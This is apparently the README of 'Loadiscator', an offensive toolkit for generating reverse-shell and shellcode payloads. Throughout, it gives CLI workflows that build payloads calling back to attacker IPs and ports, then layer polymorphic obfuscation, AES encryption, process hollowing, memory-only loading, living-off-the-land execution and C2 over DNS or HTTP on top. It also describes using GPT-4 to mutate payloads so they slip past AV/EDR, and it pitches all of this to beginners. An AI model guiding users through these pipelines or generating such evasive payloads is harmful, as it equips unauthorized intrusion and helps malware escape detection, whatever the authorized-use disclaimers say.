Red Team Payload Generation & Obfuscation Framework
🔐 Advanced AV/EDR Evasion • Adversary Simulation Toolkit
⚠️ For authorized red team operations, AV/EDR evasion research, and educational use only. Do NOT use for unauthorized access or malicious purposes.
- Overview
- Features
- Architecture
- Installation
- Dependencies
- Quick Start
- Command-Line Reference
- Advanced Modules
- Shellcode Generation
- Example Workflows
- Troubleshooting
- FAQ
- Ethical Notice
- Contribution & Support
- Disclaimer
Loadiscator is a modular, extensible framework for generating, obfuscating, and delivering payloads for red team operations, adversary simulation, and AV/EDR evasion research. It supports multiple languages, advanced obfuscation, encryption, fileless execution, and C2 integrations. The framework is designed for both CLI and (optionally) web GUI usage, with a focus on research, education, and authorized security testing.
- Multi-language Payload Generation: Python, Bash, PowerShell, C
- Obfuscation Engines: Base64, XOR, string mangling, polymorphic, metamorphic
- Encryption: AES-256-CBC
- One-liner Encoding: For Python, Bash, PowerShell
- Payload Binding: Bind to decoy files (PDF, EXE, etc.)
- Memory-Only Execution: Fileless shellcode loaders
- Process Hollowing: Run payloads in the context of legitimate processes
- Living-Off-The-Land (LOTL): Use native system tools for stealth
- C2 Integrations: MirageC2, DNS tunneling, HTTP blending
- AI-Powered Optimization: GPT-4 based payload mutation for AV/EDR bypass
- Rich CLI
- Banner and UX Enhancements: Rich ASCII art, colored output
- Extensible: Easily add new payloads, obfuscators, or C2 modules
+-------------------+
| CLI |
+-------------------+
|
+-------------------+
| Core Modules |
+-------------------+
| Payload Generator |
| Obfuscators |
| Encryptors |
| Encoders |
| Evasion |
| C2 Connectors |
| AI Optimizer |
| Utils |
+-------------------+
|
+-------------------+
| Output Payloads |
+-------------------+
- CLI: Fast User interface for all operations under cli.
- Core Modules: Modular Python packages for each function
- Output: Final payloads, scripts, and binaries
git clone https://github.com/PardhuSreeRushiVarma20060119/loadiscator.git
cd loadiscatorpip install -r requirements.txt- For shellcode generation: Python 3.x
- For C2 integration: MirageC2, DNS server, etc.
- typer - CLI framework
- jinja2 - Templating
- cryptography - Encryption
- pycryptodome - Crypto primitives
- rich - Terminal formatting
- openai - AI optimization
- requests - HTTP requests
python -m loadiscator.cli generate python 10.10.10.10 4444 -o reverse.pypython -m loadiscator.cli obfuscate polymorphic --file reverse.py -o poly_reverse.pypython -m loadiscator.cli encrypt --file poly_reverse.py --key "S3cr3tK3y123" -o encrypted.pypython -m loadiscator.cli oneliner --file encrypted.py --lang pythonpython -m loadiscator.cli generate [LANG] [IP] [PORT] -o [OUTPUT]
- LANG: python, bash, powershell, c
- Example:
python -m loadiscator.cli generate bash 192.168.1.5 9001 -o rev.sh
python -m loadiscator.cli obfuscate [TYPE] --file [INPUT] -o [OUTPUT] [--key KEY]
- TYPE: base64, xor, stringmangle, polymorphic
- Example:
python -m loadiscator.cli obfuscate xor --file rev.sh -o rev_xor.sh --key secret
python -m loadifscator.cli encrypt --file [INPUT] --key [KEY] -o [OUTPUT]
python -m loadiscator.cli oneliner --file [INPUT] --lang [LANG]
python -m loadiscator.cli ai-optimize --file [INPUT] --target [AV] -o [OUTPUT]
- Example:
python -m loadiscator.cli ai-optimize --file reverse.py --target generic -o ai_optimized.py
python -m loadiscator.cli metamorphic --file [INPUT] --iterations [N] -o [OUTPUT]
python -m loadifscator.cli hollow --process [PROCESS] -o [OUTPUT]
- Example:
python -m loadiscator.cli hollow --process notepad.exe -o hollow_payload.py
python -m loadifscator.cli memory-only --shellcode [SHELLCODE.BIN] -o [OUTPUT]
- Example:
python -m loadiscator.cli memory-only --shellcode calc_launcher.bin -o calc_loader.py
python -m loadiscator.cli living-off-land --technique [TECHNIQUE] --payload [PAYLOAD] -o [OUTPUT]
- Techniques: powershell, wmi, registry, schtasks, com, certutil, rundll32
- DNS Tunnel:
python -m loadiscator.cli dns-tunnel --domain [DOMAIN] --server [C2IP] -o [OUTPUT] - HTTP Blend:
python -m loadiscator.cli http-blend --url [C2URL] -o [OUTPUT]
- Base64: Encodes payloads in base64
- XOR: XORs payloads with a user-supplied key
- String Mangling: Splits and mangles string literals
- Polymorphic: Randomizes code structure, variable names, and adds junk code
- Metamorphic: Deep code transformation, unique build per run
- AES-256-CBC: Strong symmetric encryption for payloads
- One-liner: Converts payloads to single-line scripts for Python, Bash, PowerShell
- Memory-Only Execution: Loads and runs shellcode in memory (no disk write)
- Process Hollowing: Injects payload into a legitimate process
- Living-Off-The-Land: Uses native tools (PowerShell, WMI, etc.) for stealth
- MirageC2: Generates payloads for MirageC2
- DNS Tunnel: C2 over DNS
- HTTP Blend: C2 over HTTP(S)
- GPT-4 Integration: Mutates payloads for AV/EDR evasion
A helper script is included for generating test shellcode:
python generate_shellcode.py reverse 127.0.0.1 4444
python generate_shellcode.py bind 4444
python generate_shellcode.py calc- Output:
.binfiles for use with the memory-only loader
Shellcode Types:
- Reverse shell (Windows x64)
- Bind shell (Windows x64)
- calc.exe launcher (Windows x64)
Note: For real operations, use msfvenom, Donut, or other tools to generate production shellcode.
python generate_shellcode.py calc
python -m loadiscator.cli memory-only --shellcode calc_launcher.bin -o calc_loader.pypython -m loadiscator.cli obfuscate polymorphic --file reverse.py -o poly.py
python -m loadiscator.cli metamorphic --file poly.py --iterations 2 -o meta.py
python -m loadiscator.cli ai-optimize --file meta.py --target generic -o final.pypython -m loadiscator.cli living-off-land --technique powershell --payload reverse.py -o lotl_payload.ps1python -m loadiscator.cli c2-mirage --server http://mirage.local --listener mylistener --key APIKEY123 -o mirage_payload.py- ImportError: Ensure all dependencies are installed (
pip install -r requirements.txt) - FileNotFoundError: Check that shellcode or payload files exist and paths are correct
- PermissionError: Run as administrator if required (especially for process hollowing)
- OpenAI API Errors: Ensure your API key is set as an environment variable (
OPENAI_API_KEY) - Syntax Errors: Use the correct CLI syntax (dashes, not underscores)
- Use
--helpwith any command for usage info - Check the output files for errors or incomplete payloads
- Review the logs and console output for stack traces
Q: Is this tool legal to use?
A: Yes — but only for authorized red teaming, security research, or educational purposes. You must have explicit permission before running any generated payloads on a target system. Unauthorized use is illegal and strictly against this project's intent.
Q: Can I add my own payloads or obfuscators?**
A: Totally! Loadiscator is modular by design. Just add your logic to loadiscator/payloads/ or loadiscator/obfuscators/. It’s completely your choice — not a requirement. — but we truly appreciate contributions from the community. ❤️
Q: Does it support Linux and macOS targets?
A: Yes, many payloads (like Python, Bash) are cross-platform. However, some advanced modules (like memory-only shellcode loaders or process hollowing) are currently Windows-only due to system-specific APIs.
Q: How do I use the AI optimizer?
A: Just set your OpenAI API key as the environment variable OPENAI_API_KEY, then run the ai-optimize command. The tool will use GPT to intelligently mutate your payload for better evasion. It's an experimental but powerful feature — feedback is always welcome!
Q: Can I use real-world shellcode?
A: Yes! While Loadiscator includes a simple generate_shellcode.py for testing, you can also use tools like msfvenom, Donut, or your own C2-generated shellcode. Just pass the .bin file into the memory-only loader.
Q: Is this beginner-friendly?
A: Definitely. The CLI is designed to be intuitive, and the README gives you step-by-step examples. You don’t need to be a red team expert to start learning and using Loadiscator effectively.
Q: I found a bug / have an idea — what should I do?
A: That’s awesome! You can open an issue or submit a pull request. No pressure — but if you do contribute, we’ll make sure to give you credit and ❤️ in the changelog.
This tool is for authorized red team operations, AV/EDR evasion research, and education only. Do not use for unauthorized access or malicious purposes. The authors assume no liability for misuse.
- You are responsible for your actions.
- Always have written authorization before using this tool in any environment.
- Violations may be illegal and result in prosecution.
- PRs and issues welcome!
- For questions, open an issue or contact the maintainer.
- To add new modules, follow the structure in
loadiscator/and submit a pull request. - For feature requests, describe your use case and desired functionality.
This software is provided for research and educational purposes only. Usage without proper authorization is strictly prohibited. The authors and contributors assume no liability for misuse or damages resulting from the use of this software.
Payload&Obsfucation Framework/
- loadiscator/
- ai/ # AI-powered payload optimizer
- binder/ # Payload binding modules
- c2/ # C2 integrations (Mirage, DNS, HTTP)
- encoder/ # One-liner encoders
- encryptors/ # AES encryption
- evasion/ # Evasion modules (memory-only, hollowing, etc.)
- obfuscators/ # All obfuscation engines
- payloads/ # Payload templates (bash, c, python, powershell)
- utils/ # Utilities (banner, random name, anti-analysis)
- cli.py # Main CLI entrypoint
- README.md # This documentation
- requirements.txt # Python dependencies
- setup.py # Install script
- generate_shellcode.py # Standalone shellcode generator
- test_*.py # Test scripts
- Create a new file in
loadiscator/obfuscators/, e.g.,myobfuscator.py. - Implement a function, e.g.,
def my_obfuscate(input_file, output_file): ... - Import and add it to the CLI in
cli.py. - Document usage in the README.
- Never run generated payloads on production or sensitive systems
- Always test in isolated, controlled environments (VMs, sandboxes)
- Use strong, unique encryption keys
- Review output code before deployment
- Keep dependencies up to date
- Inspired by tools like Veil, Unicorn, Donut, and Metasploit
- Thanks to the open-source security community
This project is licensed under the MIT License.
You are free to use, modify, and distribute this project under the terms of the license.
- v1.0: Initial release with multi-language payloads, obfuscation, encryption, and C2 modules
- v1.1: Added AI optimizer, memory-only loader, and advanced evasion
- v1.2: Bug fixes, improved CLI.
I'm actively building open-source cybersecurity tools like MirageC2, PhishVault, and OpenLoRa, and Sometime Mini Tools Like This One.
If you find my work valuable, consider supporting it with love:
END OF DOCUMENTATION, Built With Love💖S